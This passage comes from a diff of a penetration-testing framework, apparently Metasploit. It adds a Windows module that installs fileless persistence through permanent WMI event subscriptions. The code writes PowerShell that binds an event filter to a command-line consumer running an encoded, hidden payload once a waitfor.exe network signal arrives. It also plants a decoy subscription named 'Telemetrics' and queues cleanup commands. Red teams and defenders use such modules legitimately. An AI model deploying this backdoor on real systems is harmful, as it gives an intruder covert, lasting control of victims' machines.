cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true) + end + end + + def subscription_logon + command = build_payload + class_name = datastore['CLASSNAME'] + <<-HEREDOC + $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= #{datastore['SYSTEM_UPTIME_START']} AND TargetInstance.SystemUpTime < #{datastore['SYSTEM_UPTIME_END']}\"; QueryLanguage = 'WQL'} + $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"} + $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer} + HEREDOC + end +end diff --git a/modules/exploits/windows/persistence/wmi/wmi_event_subscription_waitfor.rb b/modules/exploits/windows/persistence/wmi/wmi_event_subscription_waitfor.rb new file mode 100644 index 0000000000000..629276c077730 --- /dev/null +++ b/modules/exploits/windows/persistence/wmi/wmi_event_subscription_waitfor.rb @@ -0,0 +1,131 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = NormalRanking + + include Msf::Post::Windows::Powershell + include Msf::Exploit::Powershell + include Post::Windows::Priv + include Msf::Post::File + include Msf::Exploit::Local::Persistence + include Msf::Exploit::Deprecated + moved_from 'exploits/windows/local/wmi_persistence' + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'WMI Event Subscription Waitfor Persistence', + 'Description' => %q{ + This module will create a permanent WMI event subscription to achieve file-less persistence using an event filter that utilizes + the Microsoft binary waitfor.exe to wait for a signal specified + by WAITFOR_TRIGGER before executing the payload. The signal can be sent from a windows host on a LAN utilizing the waitfor.exe command + (note: requires target to have port 445 open). + + Additionally a custom command can be specified to run once the trigger is + activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a + high integrity process. It is also recommended to use staged payloads due to powershell script length limitations. + }, + 'Author' => [ + 'Nick Tyrer <@NickTyrer>', # original module + 'h00die' # docs, persistence mixin, pshell cleanup + ], + 'License' => MSF_LICENSE, + 'Privileged' => true, + 'Platform' => 'win', + 'SessionTypes' => ['meterpreter'], + 'Targets' => [['Windows', {}]], + 'DisclosureDate' => '2017-06-06', + 'DefaultTarget' => 0, + 'References' => [ + ['URL', 'https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf'], + ['URL', 'https://learn-powershell.net/2013/08/14/powershell-and-events-permanent-wmi-event-subscriptions/'], + ['ATT&CK', Mitre::Attack::Technique::T1546_003_WINDOWS_MANAGEMENT_INSTRUMENTATION_EVENT_SUBSCRIPTION] + ], + 'Notes' => { + 'Reliability' => [EVENT_DEPENDENT, REPEATABLE_SESSION], + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS] + } + ) + ) + + register_options([ + OptString.new('WAITFOR_TRIGGER', + [true, 'The word to trigger the payload. (Default: CALL)', 'CALL' ]), + OptString.new('CLASSNAME', + [true, 'WMI event class name. (Default: UPDATER)', 'UPDATER' ]) + ]) + + register_advanced_options( + [ + OptString.new('CUSTOM_PS_COMMAND', + [false, 'Custom powershell command to run once the trigger is activated. (Note: some commands will need to be enclosed in quotes)', false, ]), + ] + ) + end + + def check + print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%') # check the original value + return CheckCode::Safe('This module requires powershell to run') unless have_powershell? + + return CheckCode::Safe('This module requires admin privs to run') unless is_admin? + + return CheckCode::Safe('This module cannot run as System') if is_system? + + return CheckCode::Safe('This module requires UAC to be bypassed first') unless is_high_integrity? + + CheckCode::Appears('Likely exploitable') + end + + def install_persistence + host = session.session_host + print_status('Installing Persistence...') + psh_exec(subscription_waitfor) + print_good "Persistence installed! Call a shell using \"waitfor.exe /S #{host} /SI #{datastore['WAITFOR_TRIGGER']}\"" + # wmic will be removed Windows 11, version 25H2 or Windows 11, version 24H2 in favor of powershell + # source https://support.microsoft.com/en-us/topic/windows-management-instrumentation-command-line-wmic-removal-from-windows-e9e83c7f-4992-477f-ba1d-96f694b8665d + # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"Telemetrics\\\" DELETE\"\n" + # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"Telemetrics\\\" DELETE\"\n" + # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"Telemetrics\\\"' DELETE\"\n" + # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n" + # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"#{name_class}\\\" DELETE\"\n" + # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"' DELETE\"" + name_class = datastore['CLASSNAME'] + @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM __EventFilter WHERE Name='Telemetrics'\\\" | ForEach-Object { $_.Delete() }\"\n" + @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM CommandLineEventConsumer WHERE Name='Telemetrics'\\\" | ForEach-Object { $_.Delete() }\"\n" + @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"Telemetrics\\\"'\\\" | ForEach-Object { $_.Delete() }\"\n" + @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM __EventFilter WHERE Name='#{name_class}'\\\" | ForEach-Object { $_.Delete() }\"\n" + @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM CommandLineEventConsumer WHERE Name='#{name_class}'\\\" | ForEach-Object { $_.Delete() }\"\n" + @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"'\\\" | ForEach-Object { $_.Delete() }\"\n" + end + + def build_payload + if datastore['CUSTOM_PS_COMMAND'] + script_in = datastore['CUSTOM_PS_COMMAND'] + compressed_script = compress_script(script_in) + encoded_script = encode_script(compressed_script) + generate_psh_command_line(noprofile: true, windowstyle: 'hidden', encodedcommand: encoded_script) + else + cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true) + end + end + + def subscription_waitfor + command = build_payload + word = datastore['WAITFOR_TRIGGER'] + class_name = datastore['CLASSNAME'] + <<-HEREDOC + $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM __InstanceDeletionEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_Process' AND Targetinstance.Name = 'waitfor.exe'\"; QueryLanguage = 'WQL'} + $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"cmd.exe /C waitfor.exe #{word} && #{command} && taskkill /F /IM cmd.exe\"} + $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer} + $Filter1 = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"Telemetrics\"; Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325\"; QueryLanguage = 'WQL'} + $Consumer1 = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"Telemetrics\"; CommandLineTemplate = \"waitfor.exe #{word}\"} + $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter1; Consumer = $Consumer1} + Start-Process -FilePath waitfor.exe #{word} -NoNewWindow + HEREDOC + end +end